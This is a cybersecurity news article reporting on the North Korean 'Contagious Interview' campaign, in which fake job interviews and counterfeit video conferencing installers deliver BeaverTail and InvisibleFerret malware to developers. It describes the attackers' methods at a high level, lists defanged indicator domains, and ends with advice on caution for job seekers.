North Korean Hackers

A new cyberattack campaign, referred to as “Contagious Interview,” has been identified, where North Korean hackers use a fake video conferencing app to target developers. According to cybersecurity experts from Group-IB in Singapore, this attack was first spotted in mid-August 2024 and involves malware disguised as legitimate software to steal sensitive information from compromised systems.

You might be interested in: Google Confirms Active Exploit in Chrome

These attackers have focused on both Windows and Apple macOS users, using native installers to spread malicious software. The group behind the campaign is known as Famous Chollima, monitored by security company CrowdStrike.

How the Attack Works

The attack starts with a fake job interview, during which victims are tricked into downloading and running a malicious Node.js project. This project contains a downloader called BeaverTail, which then installs a Python-based backdoor, named InvisibleFerret. InvisibleFerret enables remote control of the victim’s device, logging keystrokes and stealing browsing history.

In some cases, BeaverTail malware has also been seen as JavaScript code, which is distributed via fake npm packages under the guise of a technical test for job applicants.

However, in July 2024, the attackers began using fake video conferencing software, including Windows MSI installers and macOS DMG files, which resembled real programs like MiroTalk. These files were used to distribute updated versions of the BeaverTail malware.

The New Strategy

Recently, instead of MiroTalk, the hackers switched to using fake software that mimics the well-known platform FreeConference.com. The malicious installer file is named “FCCCall.msi” and is likely hosted on a suspicious website called freeconference[.]io, which shares similarities with the fake mirotalk[.]net domain used in earlier attacks.

Security researcher Sharmine Low pointed out that the North Korean group is expanding its attack methods by targeting potential victims through job search platforms like LinkedIn, Moonlight, Upwork, and We Work Remotely (WWR). After establishing initial contact, the hackers often move the conversation to Telegram, where they request the victims to download the fake video conferencing app or a Node.js project to perform a supposed technical task.

Expanding the Attack with JavaScript Malware

In addition to targeting job seekers, the hackers have been injecting malicious JavaScript into cryptocurrency and gaming-related code repositories. The inserted JavaScript is designed to pull BeaverTail from domains such as ipcheck[.]cloud or regioncheck[.]net. This attack vector was highlighted by Phylum, a security firm, which discovered similar behavior in an npm package named helmet-validate.

New Targets and Advanced Features

The latest version of BeaverTail malware has been updated to target a broader range of cryptocurrency wallets, including Kaikas, Rabby, Argent X, and Exodus Web3. It also now has the capability to establish persistence using AnyDesk, making it harder for victims to remove the malware once it’s installed.

Another enhancement is the introduction of a Python-based script bundle called CivetQ, which can collect sensitive information from the victim’s browser, clipboard, and Microsoft Sticky Notes. The malware is particularly dangerous because it targets 74 different browser extensions and can extract unencrypted data from Sticky Notes stored in a specific SQLite database on Windows systems.

Lazarus Group Involvement

The infamous Lazarus Group, widely believed to be linked to North Korea, is suspected to be behind this new attack wave. The ongoing updates to the malware, as well as the group’s ability to target new platforms, show that they are constantly refining their techniques. Group-IB’s research indicates that Lazarus has been actively targeting developers since the campaign began in 2024, showing no signs of slowing down.

Conclusion

The “Contagious Interview” campaign highlights the increasing sophistication of North Korean cyber actors, particularly in the way they use fake job interviews to lure victims. As these attacks continue to evolve, they are targeting a wide range of victims across different industries, from cryptocurrency to gaming.

Recent warnings from the FBI emphasize the high level of deception involved in these schemes, as the hackers use complex social engineering tactics to steal valuable data and cryptocurrency. Businesses and individuals need to stay vigilant, especially when engaging in job searches or technical tasks online.

Key Takeaways:

• North Korean hackers are using fake video conferencing apps in cyberattacks.
• The campaign targets developers through fake job interviews.
• Malware, including BeaverTail and InvisibleFerret, is used to steal sensitive information.
• The attack has expanded to include cryptocurrency wallets and browser extensions.

It’s crucial for developers and job seekers to be cautious about unsolicited job offers and technical tasks, especially when asked to download unfamiliar software.